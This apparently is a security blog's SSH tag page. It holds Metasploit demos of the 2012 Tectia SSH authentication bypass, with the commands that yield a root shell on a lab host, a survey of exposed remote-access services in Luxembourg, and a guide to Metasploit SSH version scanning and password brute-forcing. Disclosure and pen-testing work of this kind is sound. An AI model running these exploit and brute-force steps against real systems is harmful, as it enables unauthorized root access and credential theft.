Tag Archives: SSH

Tectia SSH Server Authentication Bypass Metasploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01
Metasploit PoC the 2012-12-04

PoC provided by :

kingcope
bperry
sinn3r

Reference(s) :

Full Disclosure
Tectia Support

Affected version(s) :

SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2

Tested on Centos 5.8 x86 with :

SSH Tectia Server 6.3.2-33

Description :

This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.

Commands :

use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit

id
uname -a
/sbin/ifconfig

Tectia SSH Server Authentication Bypass Remote 0day Exploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01

PoC provided by :

kingcope

Reference(s) :

Full Disclosure Mailing-list

Affected version(s) :

All versions of Tectia SSH Server

Tested on Centos 5.8 x86 with :

Tectia SSH Server 6.3.2.33

Description :

An attacker in the possession of a valid username of an SSH Tectia installation running on UNIX (verified on AIX/Linux) can login without a password. The bug is in the “SSH USERAUTH CHANGE REQUEST” routines which are there to allow a user to change their password. A bug in the code allows an attacker to login without a password by forcing a password change request prior to authentication.

Commands :

You're OpenSSH client should be patched with the diff file provided by kingcope in order to force the password reset request.

On the target :

ifconfig
uname -a
rpm -qi ssh-tectia-server-6.3.2-33

netstat -lntp

On the attacker :

ifconfig
uname -a

./ssh -lroot 192.168.178.34

Luxembourg Critical Remote Management Applications Attack Surface

MS12-020 patch is now out since a month with associate DoS PoC’s available for pen tester’s and other populations how have not equivalent ethic. Lot of articles, blog posts have been written around CVE-2012-0002, a vulnerability discovered by Luigi Auriemma in May 2011, reported to ZDI in August 2011 and disclosed in a coordinated manner in March 2012.

One of these MS12-020 related articles was written by Dan Kaminsky, “RDP and the Critical Server Attack Surface“. This blog post fact to remember that some applications are more critical than others due to they’re roles and they’re expositions to Internet.

Dan has scan around 300 million IPs, who are representing around 8.3% of the Internet, and 415 thousands showed an open RDP (3389/TCP), a ratio of 0,14%. By extrapolation Dan has arrived to around 5 million RDP endpoints on the Internet. Hopefully for the Internet community (should I say for the sysadmins ?), despite the efforts by security researches (most on freenode #ms12-020), MS12-020 has “only” lead to a DoS exploit. Potentially 5 million BSoD’s (Blue Screen of Death), it is a blessing in disguise ?

In his article Dan Kaminsky has also remember us that other critical server attack surfaces are existing on Internet, such as TCP/IP, HTTP, SSL, SSH, DNS or SMTP, and that all these applications are playing potential essential roles for business.

I have done the same study for the Luxembourg landscape with around 550 000 IP addresses, but before giving my results I would like to explain you what is Luxembourg 🙂

If you don’t know, Luxembourg has the higher GDP in Europe and is classified in the top 3 of the list of countries by GDP per capita (Wikipedia source). Also more than 90% of population is using Internet and 82% of the population connect to Internet daily. Luxembourg became the geography with the highest ratio of malicious email activity in February 2012 regarding Symantec Intelligence Report.

Also Luxembourg has a total balance sheet of Euro 776 billion in credit institutions and the Luxembourg banking sector comprised 143 credit institutions from over 20 different countries (pwc Luxembourg source). All of these credit institutions are under the CSSF (Commission de Surveillance du Secteur Financier) surveillance and most of them are delegating their IT management to PSF (Professionals of the Financial Sector), also known as “Primary IT systems operators” and “Secondary IT systems and network operators“.

In conclusion most of the IP addresses assigned to Luxembourg have a potential high asset value for bad guys. Luxembourg IP addresses ranges assigned for Internet broadband access, have surely a bigger return on investment compared to other countries in case phishing or malware campaigns. Also IP addresses ranges assigned to professionals of the financial sector are surely hosting e-banking or fund transactions infrastructures, a prime target for cyber crime.

So, what are the results for Luxembourg, a country how normally should have a less ratio of exposition than others du to the fact that an IP address has a higher asset value than 300 million addresses arbitrary scanned. I have only focus on applications equivalent to RDP, these applications are known as “Remote Access Services” (RDP, ssh, telnet, VNC, PCAnywhere, Citrix, etc.).

In “2012 Verizon Data Breach Report“, “Remote Access Services” are noted “as continuing their rise in prevalence, as hacking vector, accounting for 88% of all breaches leveraging hacking techniques – more than any other vector“. Remote services accessible from the entire Internet, combined non patched applications, with default, weak, or stolen credentials continue to plague organizations. Scripted attacks seeking victims with known remote access ports, followed with issuance of known default vendor credentials, allow for targets of opportunity to be discovered and compromised in an automated and efficient manner.

Do you remember, Dan Kaminsky had discovered a ratio of 0,14% of open RDP on 300 million IPs. In Luxembourg, this ratio is 0,26%, twice Dan ratio. For ssh the ratio of open port is 0,79%, for telnet the ratio is 0,31% (still open telnet despite best practices ?), for VNC the ratio is 0,06% and for PCAnywhere the ratio is 0,02% (still open PCAnywhere despite the leaked source code ?).

Shouldn’t Luxembourg have a less ratios of open ports for “Remote Access Services” ? I think YES. But why are these ratios so important ? Surely because Security has fail in his mission, surely because Security is still understood as technical game and not as an insurance to protect the value of assets. Also maybe the cause could be that Internet is growing to fast and that the Internet grow speed don’t give the time to learn from errors. Internet maybe distort the reality, the memory and the time.

Just to remember a small list of vulnerabilities or backdoor’s how have target these critical remote server surfaces :

2012 :

  • SSH : cisco-sa-20120328-ssh – Cisco IOS Software Reverse SSH Denial of Service Vulnerability
  • RDP : CVE-2012-0002 – Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability
  • PCAnywhere : OSVDB-79412 – PCAnywhere 12.5.0 build 463 Denial of Service
2011 :
  • Telnet : CVE-2011-4862 – FreeBSD Telnet Service Encryption Key ID Buffer Overflow
  • FTP : OSVDB-73573 – vsftpd-2.3.4 backdoor
  • SSH : EBD-ID-17462 – OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
2010 :
  • SMTP : CVE-2010-4344 – Exim4 <= 4.69 string_format Function Heap Buffer Overflow
  • FTP : OSVDB-69562 –  ProFTPD 1.3.3c compromised source remote root Trojan
  • FTP : CVE-2010-3867 – ProFTPD IAC Remote Root Exploit
  • FTP : OSVDB-62134 – Easy FTP Server v1.7.0.11 Multiple Commands Remote Buffer Overflow Exploit (Post Auth)
2009 :
  • FTP : CVE-2009-3023 – Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
2008 :
  • DNS : CVE-2008-1447 – Remote DNS Cache Poisoning Flaw Exploit
  • SSH : CVE-2008-0166 – Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
Etc. Etc.

Metasploit SSH Auxiliary Modules

Metasploit provide some SSH auxiliary modules who will permit you to scan the running version and do brute force login.

You can find all these auxiliary modules through the Metasploit search command.

SSH version scanner (ssh_version)

To invoke this auxiliary module just type the following command :

Just provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize version scans, just increase the number of concurrent threads by setting the “THREADS” variable. In order to reduce the SSH connexion timeout, decrease the value of “TIMEOUT” variable.

SSH authentication brute force login (ssh_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate against a SSH server using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit provide files for “USER_FILE” (/opt/metasploit3/msf3/data/wordlists/unix_users.txt) and “PASS_FILE” (/opt/metasploit3/msf3/data/wordlists/unix_passwords.txt). You can also use SkullSecurity password lists, or my own list how is updated regularly. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be a an unique IP address, an IP addresses range or a file. Each discovered matching login and password will create a Metasploit session.

Valid login attempts are displayed in green and non valid in red.